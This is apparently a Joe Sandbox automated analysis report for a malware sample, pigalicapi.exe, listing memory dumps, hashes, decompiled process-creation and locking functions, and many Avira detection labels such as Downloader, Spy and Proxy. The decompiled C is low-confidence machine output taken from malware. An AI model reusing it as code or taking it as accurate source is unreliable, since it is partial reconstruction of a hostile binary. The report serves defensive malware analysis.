Source File: 00000001.00000002.630678396.0000000000402000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.630393868.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.630561595.0000000000401000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631400390.000000000041F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631534886.0000000000422000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631640213.0000000000423000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631857089.000000000042B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631957410.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.632483760.0000000000444000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_pigalicapi.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 22739cb87aa6bf5ec0b8609a5980fe21be2e206d39622b15aafff76b155d4342
Instruction ID: 2671b0a13e0022686a5f159adedc0d204adf9fcc5b257b9fc773f72bb2b13b5b
Opcode Fuzzy Hash: 22739cb87aa6bf5ec0b8609a5980fe21be2e206d39622b15aafff76b155d4342
Instruction Fuzzy Hash: 7CD12BB0604306DFD720EF25D54435BBBE0AF80344F50883EE9859B361D7BD998ADB9A

Uniqueness

Uniqueness Score: -1.00%

Function 024E1E60 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44
processCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E024E1E60(CHAR* _a4) {
				void* _v8;
				struct _PROCESS_INFORMATION _v24;
				struct _STARTUPINFOA _v100;

				_v8 = 0;
				if(_a4 != 0) {
					E024E7D20(E024E7D20( &_v24,  &_v24, 0, 0x10),  &_v100, 0, 0x44);
					_v100.cb = 0x44;
					if(CreateProcessA(0, _a4, 0, 0, 0, 0, 0, 0,  &_v100,  &_v24) != 0) {
						CloseHandle(_v24.hThread);
						_v8 = _v24.hProcess;
					}
				}
				return _v8;
			}

0x024e1e66
0x024e1e71
0x024e1e8b
0x024e1e93
0x024e1ebc
0x024e1ec2
0x024e1ecb
0x024e1ecb
0x024e1ebc
0x024e1ed4

APIs

CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 024E1EB4
CloseHandle.KERNEL32(?), ref: 024E1EC2

Strings

D, xrefs: 024E1E93

Memory Dump Source

Source File: 00000001.00000002.642876389.00000000024E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: true

Associated: 00000001.00000002.642718154.00000000024E0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.643378615.00000000024EC000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.643609709.00000000024EE000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24e0000_pigalicapi.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: D
API String ID: 3712363035-2746444292
Opcode ID: 7fed17b526897181abf2820413deb7b50ff0f8853222db3e75a3eae1b4f868f0
Instruction ID: bd0876565d658c7f31662f555e5658017957f01ab8ecaeaf096241c8d74d616e
Opcode Fuzzy Hash: 7fed17b526897181abf2820413deb7b50ff0f8853222db3e75a3eae1b4f868f0
Instruction Fuzzy Hash: 43016275A4030CABEF10DBD4DC45FEE77B9AB04705F044559F6096B2C0D7B09A04CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00416BA0 Relevance: 5.1, APIs: 4, Instructions: 91
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E00416BA0(intOrPtr* _a4) {
				void* _v16;
				intOrPtr _v32;
				signed int* _v36;
				intOrPtr _v40;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int* _t35;
				intOrPtr _t37;
				intOrPtr _t38;
				intOrPtr _t45;
				intOrPtr _t59;
				intOrPtr* _t60;
				intOrPtr* _t61;
				intOrPtr* _t62;
				intOrPtr* _t64;

				_t60 = _a4;
				_t45 =  *_t60;
				_t59 = _t45 + 0x14;
				 *_t61 = _t59;
				EnterCriticalSection(??);
				_t32 =  *((intOrPtr*)(_t45 + 0xc));
				_t62 = _t61 - 4;
				if(_t32 == 0) {
					_t33 =  *((intOrPtr*)(_t45 + 0x10));
					if(_t33 == 0x3ffffffe) {
						_t34 = _t45 + 0x60;
						_v32 = _t34;
						_t35 = _t45 + 0x48;
						_v36 = _t35;
						 *((intOrPtr*)(_t45 + 0x10)) = 0x3fffffff;
						_v40 = _t34;
						 *_t62 = _t35;
						_t37 = E00416590( *((intOrPtr*)(_t45 + 0x68)), 0xffffffff, 1);
						if(_t37 != 0) {
							L13:
							_v32 = _t37;
							 *_t62 = _t59;
							LeaveCriticalSection(??);
							_t38 = _v32;
							 *((intOrPtr*)( *((intOrPtr*)(_t60 + 8)))) = _t38;
						} else {
							 *((intOrPtr*)(_t45 + 8)) =  *((intOrPtr*)(_t45 + 8)) -  *((intOrPtr*)(_t45 + 0x10));
							 *_t62 = _v32;
							_t37 = E00415CC0( *((intOrPtr*)(_t45 + 0x68)), _v36, 1);
							if(_t37 != 0) {
								goto L13;
							} else {
								 *((intOrPtr*)(_t45 + 0x10)) = 0;
								goto L9;
							}
						}
					} else {
						 *((intOrPtr*)(_t45 + 0x10)) = _t33 + 1;
						L9:
						 *_t62 = _t59;
						LeaveCriticalSection(??);
						_t64 = _t62 - 4;
						goto L4;
					}
				} else {
					_v32 = _t32;
					 *((intOrPtr*)(_t45 + 0xc)) = _t32 - 1;
					 *_t62 = _t59;
					LeaveCriticalSection(??);
					_t64 = _t62 - 4;
					if(_v32 != 1) {
						L4:
						 *_t64 =  *((intOrPtr*)(_t60 + 4));
						_t38 = E00413FD0();
						if(_t38 != 0) {
							goto L5;
						}
					} else {
						 *_t64 = _t45 + 0x60;
						_t38 = E00415CC0( *((intOrPtr*)(_t45 + 0x68)), _t45 + 0x48, 1);
						if(_t38 != 0) {
							L5:
							 *((intOrPtr*)( *((intOrPtr*)(_t60 + 8)))) = _t38;
						} else {
							goto L4;
						}
					}
				}
				return _t38;
			}

APIs

EnterCriticalSection.KERNEL32 ref: 00416BB4
LeaveCriticalSection.KERNEL32 ref: 00416BD0

Part of subcall function 00415CC0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,0040EEEC,0040EF44,?,?,004168B3), ref: 00415CD4
Part of subcall function 00415CC0: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,0040EEEC,0040EF44,?,?,004168B3), ref: 00415CFB

LeaveCriticalSection.KERNEL32 ref: 00416C33

Memory Dump Source

Source File: 00000001.00000002.630678396.0000000000402000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.630393868.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.630561595.0000000000401000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631400390.000000000041F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631534886.0000000000422000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631640213.0000000000423000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631857089.000000000042B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631957410.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.632483760.0000000000444000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_pigalicapi.jbxd

Similarity

API ID: CriticalSection$Leave$Enter
String ID:
API String ID: 2978645861-0
Opcode ID: 8458b5734e16408b39341963bf49e5e1ccedcd04d7dc40a0a900725c30042377
Instruction ID: afac81c6ed25875daa77134f2d8d7e06c8d97d8ea1c66be795d6737b6d9f3f86
Opcode Fuzzy Hash: 8458b5734e16408b39341963bf49e5e1ccedcd04d7dc40a0a900725c30042377
Instruction Fuzzy Hash: F5311874A003058FCB10EF69D4846AABBF4FF48314F01856AEC958B345E738E886CBD6

Uniqueness

Uniqueness Score: -1.00%

Function 00416830 Relevance: 5.1, APIs: 4, Instructions: 86
COMMON

Download Yara Rule

C-Code - Quality: 32%

			E00416830(intOrPtr* _a4) {
				void* _v12;
				intOrPtr _v16;
				intOrPtr _v24;
				intOrPtr _t23;
				intOrPtr _t24;
				intOrPtr _t28;
				intOrPtr _t30;
				intOrPtr _t33;
				intOrPtr* _t36;
				intOrPtr* _t41;
				intOrPtr _t45;
				intOrPtr _t47;
				intOrPtr _t49;
				void* _t51;
				intOrPtr* _t52;
				intOrPtr* _t54;

				_t23 = 0x16;
				_t52 = _t51 - 0x10;
				_t41 = _a4;
				if(_t41 == 0) {
					L4:
					return _t23;
				}
				_t36 =  *_t41;
				if(_t36 == 0) {
					goto L4;
				}
				if(_t36 == 0xffffffff) {
					_t23 = 0;
					goto L4;
				}
				if( *_t36 == 0xc0bab1fd) {
					_t3 = _t36 + 0x14; // 0x40ef44
					_t49 = _t3;
					 *_t52 = _t49;
					EnterCriticalSection(??);
					_t4 = _t36 + 0xc; // 0x26748d
					_t24 =  *_t4;
					_t54 = _t52 - 4;
					if(_t24 == 0) {
						_t10 = _t36 + 0x10; // 0x424448b
						if( *((intOrPtr*)(_t36 + 8)) <=  *_t10) {
							L15:
							 *_t54 = _t49;
							LeaveCriticalSection(??);
							E00412210();
							_t23 = 0;
							goto L4;
						}
						_t12 = _t36 + 0x68; // 0x5f74c085
						_t13 = _t36 + 0x60; // 0x40ef90
						_v24 = _t13;
						_t15 = _t36 + 0x48; // 0x40ef78
						 *_t54 = _t15;
						_t28 = E00416590( *_t12, 0xffffffff, 1);
						if(_t28 != 0) {
							_v16 = _t28;
							 *_t54 = _t49;
							LeaveCriticalSection(??);
							E00412210();
							_t23 = _v16;
							goto L4;
						}
						_t16 = _t36 + 0x10; // 0x424448b
						_t45 =  *_t16;
						_t17 = _t36 + 8; // 0x90c3ffff
						_t30 =  *_t17;
						if(_t45 != 0) {
							 *((intOrPtr*)(_t36 + 0x10)) = 0;
							_t30 = _t30 - _t45;
						}
						 *((intOrPtr*)(_t36 + 8)) = _t30 - 1;
						 *((intOrPtr*)(_t36 + 0xc)) = 1;
						L9:
						 *_t54 = _t49;
						LeaveCriticalSection(??);
						_t8 = _t36 + 0x64; // 0x8b0000
						_t9 = _t36 + 0x2c; // 0x40ef5c
						 *((intOrPtr*)(_t54 - 4)) = _t36 + 0x44;
						_t33 = E00415CC0( *_t8, _t9, 1);
						E00412210();
						_t23 = _t33;
						goto L4;
					}
					_t5 = _t36 + 8; // 0x90c3ffff
					_t47 =  *_t5;
					if(_t47 == 0) {
						goto L15;
					}
					 *((intOrPtr*)(_t36 + 8)) = _t47 - 1;
					 *((intOrPtr*)(_t36 + 0xc)) = _t24 + 1;
					goto L9;
				}
				goto L4;
			}

APIs

EnterCriticalSection.KERNEL32(0040EF30,?,?,0041586E), ref: 0041686A
LeaveCriticalSection.KERNEL32(?,?,?,?,0041586E), ref: 00416894

Memory Dump Source

Source File: 00000001.00000002.630678396.0000000000402000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.630393868.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.630561595.0000000000401000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631400390.000000000041F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631534886.0000000000422000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631640213.0000000000423000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631857089.000000000042B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631957410.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.632483760.0000000000444000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_pigalicapi.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: 67f6eefd186e211514c6403da3bfbfd4d13a57ff0a28058042ffd3782a5fdb61
Instruction ID: 05cb7648b5923e93bfa705c3ba05a15a8be0429bffce4b91882e804ee0f157c8
Opcode Fuzzy Hash: 67f6eefd186e211514c6403da3bfbfd4d13a57ff0a28058042ffd3782a5fdb61
Instruction Fuzzy Hash: 07316CB06002018FDB10BF69C5C46AA7BA1FF44314F15C96EEC158B34AE739D985CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 00416950 Relevance: 5.1, APIs: 4, Instructions: 86
COMMON

Download Yara Rule

C-Code - Quality: 32%

			E00416950(intOrPtr* _a4) {
				void* _v16;
				intOrPtr _v32;
				intOrPtr _v40;
				intOrPtr _t23;
				intOrPtr _t24;
				intOrPtr _t28;
				intOrPtr _t30;
				intOrPtr _t32;
				intOrPtr* _t35;
				intOrPtr* _t40;
				signed int _t45;
				intOrPtr _t46;
				void* _t48;
				intOrPtr* _t49;
				intOrPtr* _t51;

				_t23 = 0x16;
				_t49 = _t48 - 0x1c;
				_t40 = _a4;
				if(_t40 == 0) {
					L4:
					return _t23;
				}
				_t35 =  *_t40;
				if(_t35 == 0) {
					goto L4;
				}
				if(_t35 == 0xffffffff) {
					_t23 = 0;
					goto L4;
				}
				if( *_t35 == 0xc0bab1fd) {
					_t46 = _t35 + 0x14;
					 *_t49 = _t46;
					EnterCriticalSection(??);
					_t24 =  *((intOrPtr*)(_t35 + 0xc));
					_t51 = _t49 - 4;
					if(_t24 == 0) {
						if( *((intOrPtr*)(_t35 + 8)) <=  *((intOrPtr*)(_t35 + 0x10))) {
							L15:
							 *_t51 = _t46;
							LeaveCriticalSection(??);
							E00412210();
							_t23 = 0;
							goto L4;
						}
						_v40 = _t35 + 0x60;
						 *_t51 = _t35 + 0x48;
						_t28 = E00416590( *((intOrPtr*)(_t35 + 0x68)), 0xffffffff, 1);
						if(_t28 != 0) {
							_v32 = _t28;
							 *_t51 = _t46;
							LeaveCriticalSection(??);
							E00412210();
							_t23 = _v32;
							goto L4;
						}
						_t30 =  *((intOrPtr*)(_t35 + 0x10));
						_t45 =  *((intOrPtr*)(_t35 + 8));
						if(_t30 != 0) {
							 *((intOrPtr*)(_t35 + 0x10)) = 0;
							_t45 = _t45 - _t30;
						}
						 *((intOrPtr*)(_t35 + 8)) = 0;
						 *((intOrPtr*)(_t35 + 0xc)) = _t45;
						L9:
						 *_t51 = _t46;
						LeaveCriticalSection(??);
						 *((intOrPtr*)(_t51 - 4)) = _t35 + 0x44;
						_t32 = E00415CC0( *((intOrPtr*)(_t35 + 0x64)), _t35 + 0x2c, _t45);
						E00412210();
						_t23 = _t32;
						goto L4;
					}
					_t45 =  *((intOrPtr*)(_t35 + 8));
					if(_t45 == 0) {
						goto L15;
					}
					 *((intOrPtr*)(_t35 + 8)) = 0;
					 *((intOrPtr*)(_t35 + 0xc)) = _t24 + _t45;
					goto L9;
				}
				goto L4;
			}

APIs

EnterCriticalSection.KERNEL32 ref: 0041698A
LeaveCriticalSection.KERNEL32 ref: 004169B4

Memory Dump Source

Source File: 00000001.00000002.630678396.0000000000402000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.630393868.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.630561595.0000000000401000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631400390.000000000041F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631534886.0000000000422000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631640213.0000000000423000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631857089.000000000042B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631957410.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.632483760.0000000000444000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_pigalicapi.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: c33ec732f80b659cce35f99fb264f15b02028685b48b232e4bea87b4582e7bd9
Instruction ID: 1550a3b30af1b3d5739506e796b0290a9769e07061fc54df4d8527e034a952a5
Opcode Fuzzy Hash: c33ec732f80b659cce35f99fb264f15b02028685b48b232e4bea87b4582e7bd9
Instruction Fuzzy Hash: 35316FB06002018FCB10AF69D5C46AB7BB0EF44350F1A857AEC459F34AE738D895CF9A

Uniqueness

Uniqueness Score: -1.00%

Function 0040D6A0 Relevance: 5.0, APIs: 4, Instructions: 48COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 0040D6C7
free.MSVCRT ref: 0040D711
LeaveCriticalSection.KERNEL32 ref: 0040D71D

Memory Dump Source

Source File: 00000001.00000002.630678396.0000000000402000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.630393868.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.630561595.0000000000401000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631400390.000000000041F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631534886.0000000000422000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631640213.0000000000423000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631857089.000000000042B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631957410.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.632483760.0000000000444000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_pigalicapi.jbxd

Similarity

API ID: CriticalSection$EnterLeavefree
String ID:
API String ID: 4020351045-0
Opcode ID: 4610c1a5b9857c503adf5da19f6fa4e820977606d10de2c50b457a4da0e04751
Instruction ID: 15fce7b54c8e5e1fc0f85ba65380c6ebfde49fb6f69f57a2b6804990dbcebb8c
Opcode Fuzzy Hash: 4610c1a5b9857c503adf5da19f6fa4e820977606d10de2c50b457a4da0e04751
Instruction Fuzzy Hash: F0018B70B00201CFC700EFB8E58452ABBE0BF44304B94497EE889D7390E778E859CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 0040D590 Relevance: 5.0, APIs: 4, Instructions: 39COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 0040D5A0
TlsGetValue.KERNEL32 ref: 0040D5C5
GetLastError.KERNEL32 ref: 0040D5D0
LeaveCriticalSection.KERNEL32 ref: 0040D5F0

Memory Dump Source

Source File: 00000001.00000002.630678396.0000000000402000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.630393868.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.630561595.0000000000401000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631400390.000000000041F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631534886.0000000000422000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631640213.0000000000423000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631857089.000000000042B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631957410.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.632483760.0000000000444000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_pigalicapi.jbxd

Similarity

API ID: CriticalSection$EnterErrorLastLeaveValue
String ID:
API String ID: 682475483-0
Opcode ID: 2c84c1ffd8b1c17e096c6591a1ead9b1f70f7a80ca5ad25b355e63b48a2b1e91
Instruction ID: aa3a49ff768a6b075f2888eed2ac29caeab34b7e920cbfe53a71fda84f8aa413
Opcode Fuzzy Hash: 2c84c1ffd8b1c17e096c6591a1ead9b1f70f7a80ca5ad25b355e63b48a2b1e91
Instruction Fuzzy Hash: A6F06D76A00704ABC720BFB9A94855ABBB4FF84350F450539DC9593300D738B819CADA

Uniqueness

Uniqueness Score: -1.00%

Source: 6.3.svchost.exe.2fe0000.1.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 3.3.svchost.exe.3aa0000.1.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 10.2.svchost.exe.13140000.1.unpack	Avira: Label: TR/Proxy.Gen
Source: 22.2.svchost.exe.406b200.3.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 11.2.svchost.exe.13140000.1.unpack	Avira: Label: TR/Proxy.Gen
Source: 15.2.svchost.exe.13140000.1.unpack	Avira: Label: TR/Proxy.Gen
Source: 3.2.svchost.exe.406b200.2.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 1.2.pigalicapi.exe.10010318.12.unpack	Avira: Label: TR/Downloader.Gen
Source: 12.2.svchost.exe.4004000.2.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 17.2.svchost.exe.7ebd0000.1.unpack	Avira: Label: TR/ATRAPS.Gen
Source: 16.2.svchost.exe.13140000.1.unpack	Avira: Label: TR/Proxy.Gen
Source: 1.2.pigalicapi.exe.24c1e88.2.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 2.2.pigalicapi.exe.f3e290.5.unpack	Avira: Label: TR/Downloader.Gen
Source: 0.2.6gjnnBAbpc.exe.10004088.14.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 19.2.svchost.exe.4000000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 11.2.svchost.exe.4000000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 2.2.pigalicapi.exe.10004088.11.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 22.2.svchost.exe.4050e00.4.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 1.2.pigalicapi.exe.10004088.11.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 12.2.svchost.exe.4050e00.4.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 3.3.svchost.exe.3bf0000.7.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 0.2.6gjnnBAbpc.exe.400e290.12.unpack	Avira: Label: TR/Downloader.Gen
Source: 22.2.svchost.exe.4004000.5.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 3.3.svchost.exe.3bf0000.5.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 2.2.pigalicapi.exe.10010318.12.unpack	Avira: Label: TR/Downloader.Gen
Source: 6.2.svchost.exe.4050e00.2.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.2.svchost.exe.4050e00.3.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 1.2.pigalicapi.exe.24e0000.4.unpack	Avira: Label: TR/Spy.Gen
Source: 1.3.pigalicapi.exe.47212b9.2.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 14.2.svchost.exe.4000000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 2.2.pigalicapi.exe.f11e88.1.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 9.2.svchost.exe.13140000.1.unpack	Avira: Label: TR/Proxy.Gen
Source: 2.2.pigalicapi.exe.f30000.4.unpack	Avira: Label: TR/Spy.Gen
Source: 3.3.svchost.exe.54a0000.0.unpack	Avira: Label: TR/Crypt.XPACK.Gen2
Source: 7.3.svchost.exe.54a0000.0.unpack	Avira: Label: TR/ATRAPS.Gen
Source: 18.2.svchost.exe.4000000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 1.3.pigalicapi.exe.46f04b9.5.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 0.2.6gjnnBAbpc.exe.2790000.6.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 6.2.svchost.exe.406b200.3.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 19.2.svchost.exe.13140000.1.unpack	Avira: Label: TR/Proxy.Gen
Source: 3.3.svchost.exe.3bf0000.3.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 14.2.svchost.exe.13140000.1.unpack	Avira: Label: TR/Proxy.Gen
Source: 21.2.svchost.exe.13140000.1.unpack	Avira: Label: TR/Proxy.Gen
Source: 3.2.svchost.exe.4036a00.6.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 3.2.svchost.exe.4004000.5.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 6.3.svchost.exe.54a0000.0.unpack	Avira: Label: TR/ATRAPS.Gen
Source: 21.2.svchost.exe.4000000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 3.2.svchost.exe.4050e00.3.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 0.2.6gjnnBAbpc.exe.4000000.11.unpack	Avira: Label: TR/Spy.Gen
Source: 8.2.svchost.exe.7eff0000.1.unpack	Avira: Label: TR/ATRAPS.Gen
Source: 7.3.svchost.exe.2fe0000.5.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 6.3.svchost.exe.2ff0000.5.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 7.2.svchost.exe.406b200.6.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 22.2.svchost.exe.4036a00.6.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 0.2.6gjnnBAbpc.exe.2791e88.5.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 12.2.svchost.exe.4036a00.6.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 18.2.svchost.exe.13140000.1.unpack	Avira: Label: TR/Proxy.Gen
Source: 2.3.pigalicapi.exe.47712b9.3.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.2.svchost.exe.4004000.4.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 2.2.pigalicapi.exe.f10000.2.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 2.3.pigalicapi.exe.47404b9.4.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.2.svchost.exe.4036a00.5.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 1.2.pigalicapi.exe.29f04b9.7.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 15.2.svchost.exe.4000000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 17.2.svchost.exe.4000000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 6.2.svchost.exe.4004000.5.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 6.3.svchost.exe.2ff0000.3.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 6.3.svchost.exe.2ff0000.7.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 3.3.svchost.exe.54a0000.2.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 6.2.svchost.exe.4036a00.4.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 1.2.pigalicapi.exe.24c0000.1.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 12.2.svchost.exe.406b200.3.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.2.svchost.exe.4000000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 7.3.svchost.exe.2fe0000.3.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 1.2.pigalicapi.exe.24ee290.5.unpack	Avira: Label: TR/Downloader.Gen
Source: 9.2.svchost.exe.4000000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 7.3.svchost.exe.2fd0000.1.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 0.2.6gjnnBAbpc.exe.279e118.7.unpack	Avira: Label: TR/Downloader.Gen
Source: 13.2.svchost.exe.4000000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 2.2.pigalicapi.exe.f1e118.3.unpack	Avira: Label: TR/Downloader.Gen
Source: 7.3.svchost.exe.2fe0000.7.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 16.2.svchost.exe.4000000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 1.2.pigalicapi.exe.24ce118.3.unpack	Avira: Label: TR/Downloader.Gen
Source: 13.2.svchost.exe.7e6e0000.1.unpack	Avira: Label: TR/ATRAPS.Gen
Source: 0.2.6gjnnBAbpc.exe.10010318.13.unpack	Avira: Label: TR/Downloader.Gen
Source: 8.2.svchost.exe.4000000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen

Source: C:\Users\user\Desktop\6gjnnBAbpc.exe	Code function: 4x nop then sub esp, 1Ch		0_2_00417380
Source: C:\Users\user\pigalicapi.exe	Code function: 4x nop then sub esp, 1Ch		1_2_00417380

